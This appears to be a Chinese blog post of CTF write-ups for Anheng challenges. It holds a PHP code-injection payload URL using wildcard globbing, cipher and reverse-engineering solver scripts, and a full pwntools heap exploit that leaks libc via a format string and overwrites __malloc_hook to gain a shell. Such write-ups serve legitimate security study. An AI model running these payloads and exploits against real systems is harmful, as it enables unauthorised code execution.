Tianji's Blog.

anheng

ctf
Word count: 935 / Reading time: 5 min
2018/09/22 Share

babypass

payload: http://101.71.29.5:10014/?code=?><?=/???/??? /*?>

go(md5你找到的字符串)

见识太短,google也没找到。悲剧。–by 一叶飘零

ciphertext.txt:

1
ilnllliiikkninlekile

解密脚本:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
import itertools
import libnum
key = []
cipher = "ilnllliiikkninlekile"
for i in itertools.permutations('ilnke', 5):
    key.append(''.join(i))
for now_key in key:
    solve_c = ""
    res = ""
    for now_c in cipher:
        solve_c += str(now_key.index(now_c))
    for i in range(0,len(solve_c),2):
        now_ascii = int(solve_c[i])*5+int(solve_c[i+1])+97
        print "now_ascii:", now_ascii, chr(now_ascii)
        if now_ascii > ord('i'):
            now_ascii += 1
        res += chr(now_ascii)
    if "flag" in res:
        print now_key,res

NewDriver

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
key=[0x66, 0x32, 0xCA, 0xA0, 0xBF, 0x98, 0x2D, 0x76, 0xF1, 0x59, 0x2A, 0x4A, 0xF4, 0x30, 0xAD, 0xD2, 0x1D, 0x02, 0xD8, 0x23, 0x89, 0x5D, 0x83, 0x38, 0x09, 0xF2, 0x74, 0x65, 0x40, 0x19, 0xC6, 0xDD, 0x18, 0xD3, 0x8F, 0x6C, 0x8B, 0xC0, 0xC5, 0x54, 0x2E, 0x81, 0x10, 0xC4, 0x26, 0x56, 0x5F, 0x53, 0x80, 0x43, 0x27, 0x62, 0xEA, 0x3D, 0xE6, 0x00, 0xE7, 0xB7, 0x50, 0x94, 0x90, 0x4C, 0x3F, 0x9D, 0x07, 0xE0, 0xA3, 0x9C, 0x4E, 0x0F, 0x9F, 0xFE, 0x5B, 0x8E, 0xDE, 0x88, 0x72, 0x2F, 0xC1, 0x67, 0x31, 0x70, 0x8D, 0xFD, 0xBE, 0x64, 0xC3, 0xBD, 0x6B, 0x7A, 0xCF, 0x0C, 0x34, 0x1F, 0x6F, 0x01, 0xF0, 0x7C, 0x5E, 0xA4, 0x1E, 0x49, 0x8C, 0x75, 0x1C, 0xE3, 0x20, 0x48, 0x28, 0x79, 0xA5, 0x7F, 0xF5, 0xEC, 0x4F, 0x78, 0x58, 0x11, 0xF7, 0xCD, 0x91, 0x13, 0xFC, 0xB8, 0x2C, 0x04, 0xEE, 0xD5, 0x08, 0x44, 0xA9, 0xE1, 0xB1, 0x42, 0x84, 0x29, 0xA7, 0x47, 0x97, 0x7E, 0xE8, 0xB3, 0x60, 0x0B, 0xF9, 0x4B, 0x3C, 0x77, 0x17, 0x03, 0x82, 0x69, 0x87, 0xD4, 0x95, 0x1A, 0x33, 0x25, 0x6E, 0xCC, 0xD6, 0xBB, 0x99, 0xB0, 0x85, 0x41, 0xB2, 0x0D, 0xDB, 0x35, 0x3B, 0x5C, 0xF8, 0xED, 0x9E, 0xA6, 0x96, 0x39, 0x63, 0x0A, 0x1B, 0x93, 0x21, 0x46, 0x12, 0xD0, 0xB4, 0x22, 0x51, 0xC9, 0x61, 0xD1, 0x2B, 0xAA, 0x45, 0x06, 0x05, 0xCE, 0xFA, 0x92, 0x68, 0xAB, 0x36, 0xDA, 0xC8, 0xE2, 0x37, 0xD9, 0xA2, 0x5A, 0xD7, 0x6A, 0xB5, 0xFF, 0xE9, 0xBA, 0x52, 0x15, 0xF6, 0xBC, 0x9A, 0xB6, 0xEF, 0x6D, 0xCB, 0x4D, 0xAE, 0xE4, 0xA1, 0xAC, 0xEB, 0x0E, 0x71, 0x7B, 0xF3, 0x24, 0xC2, 0xFB, 0x7D, 0x86, 0x55, 0xAF, 0x3A, 0xDF, 0x3E, 0x14, 0xB9, 0x9B, 0x16, 0xDC, 0x73, 0x57, 0xE5, 0xC7, 0x8A, 0xA8, 0x66, 0x6C, 0x61, 0x67, 0x7B, 0x74, 0x68, 0x69, 0x73, 0x5F, 0x69, 0x73, 0x5F, 0x6E, 0x6F, 0x74, 0x5F, 0x74, 0x68, 0x65, 0x5F, 0x66, 0x6C, 0x61, 0x67, 0x5F, 0x68, 0x61, 0x68, 0x61, 0x68, 0x61, 0x7D]
key2=[0x20, 0xC3, 0x1A, 0xAE, 0x97, 0x3C, 0x7A, 0x41, 0xDE, 0xF6, 0x78, 0x15, 0xCB, 0x4B, 0x4C, 0xDC, 0x26, 0x55, 0x8B, 0x55, 0xE5, 0xE9, 0x55, 0x75, 0x40, 0x3D, 0x82, 0x13, 0xA5, 0x60, 0x13, 0x3B, 0xF5, 0xD8, 0x19, 0x0E, 0x47, 0xCF, 0x5F, 0x5E, 0xDE, 0x9D, 0x14, 0xBD]

for v3 in range(44):
  v3+=1
  v6=key[v3]
  v4=(v6+v4)%256
  key[v3]=key[v4]
  key[v4]=v6
  key3.append(key[(key[v3]+v6)%256])
for i in range(44):
  key2[i]^=key3[i]
for i in key2:
  s+=chr(i)

print s
data = s

mima   = "ABCDEFGHIJSTUVWKLMNOPQRXYZabcdqrstuvwxefghijklmnopyz0123456789+/"
common = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"

data = "ZeptZ3l5UHQra25nd19yYzMrYR5wX2Jtc2P2VF9gYNM9"

data1 = ""
for i in data:
    data1 += common[mima.index(i)]

print data1

安恒10月 pwn - leak

  • 通过格式化字符串漏洞泄露libc
  • 通过堆溢出

首先通过堆溢出,修改top chunk 的size字段,将top chunk送入unsorted bin,参考house_of_orange前半部分

然后通过堆溢出,修改top chunk 的size字段,将新的top chunk送入fast bin,参考house_of_orange前半部分

接着,将unsorted bin中的top chunk申请出来,通过溢出,来构造fast bin链

连续申请两次fast bin,然后即可修改 _malloc_hook的值。

exp来自某不知道名字的大佬。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
from pwn import*
#context.log_level=True
elf=ELF('level1')
libc=ELF('libc.so.6')
p=process('./level1')
#p=remote('101.71.29.5',10012)
def create(x,y):
    p.recvuntil('3:exit\n')
    p.sendline('1')
    p.recvuntil('size: ')
    p.sendline(str(x))
    p.recvuntil('string: ')
    p.sendline(y)

def show():
    p.recvuntil('3:exit\n')
    p.sendline('2')
    p.recvuntil('result: ')
    
def pwn():
    create(0xaf0,'%13$lx')
    show()
    libc_start_main=int(p.recv(12),16)-0xf0
    
    print hex(libc_start_main)
    libcbase=libc_start_main-0x0020740
    print hex(libcbase)

    mallochook=libcbase+0x3c4b10
    print "mallochook", hex(mallochook)

    create(0x3c0,'b'*0x3c0+p64(0)+p64(0x131))

    one=libcbase+0xf1147            

    # unsorted_bin exist
    create(0xcf0,'a') # this chunk will be in the second page
    create(0x260,'b'*0x260+p64(0)+p64(0x91))
    # over 0x564c6bf0bf70

    # fast_bin exist
    create(0x200,'ddd') # this chunk will be in the third page
    
    # add malloc_hook to fastbin
    create(0x100,'d'*0x21090+p64(0)+p64(0x71)+p64(mallochook-0x13))
    
    attach(p)
    create(0x60,'a')
    
    create(0x60, "aaa" + p64(one))
    
    p.recvuntil('3:exit\n')
    p.sendline('1')
    p.recvuntil('size: ')
    p.sendline('20')
    p.interactive()

pwn()

原文作者: Tianji

原文链接: https://www.tiandiwuji.top/posts/45708/

发表日期: September 22nd 2018, 9:37:18 am

版权声明: 本文采用知识共享署名-非商业性使用 4.0 国际许可协议进行许可

CATALOG
  1. 1. babypass
  2. 2. go(md5你找到的字符串)
  3. 3. NewDriver
  4. 4. 安恒10月 pwn - leak
Total : 77
2099
2019
2018
pwn ctf web安全 ctf_php_debug 置顶 工具手册 dubbo jvm linux 运维 mysql php python python安全 前端 zookeeper 渗透测试 安全体系建设
安全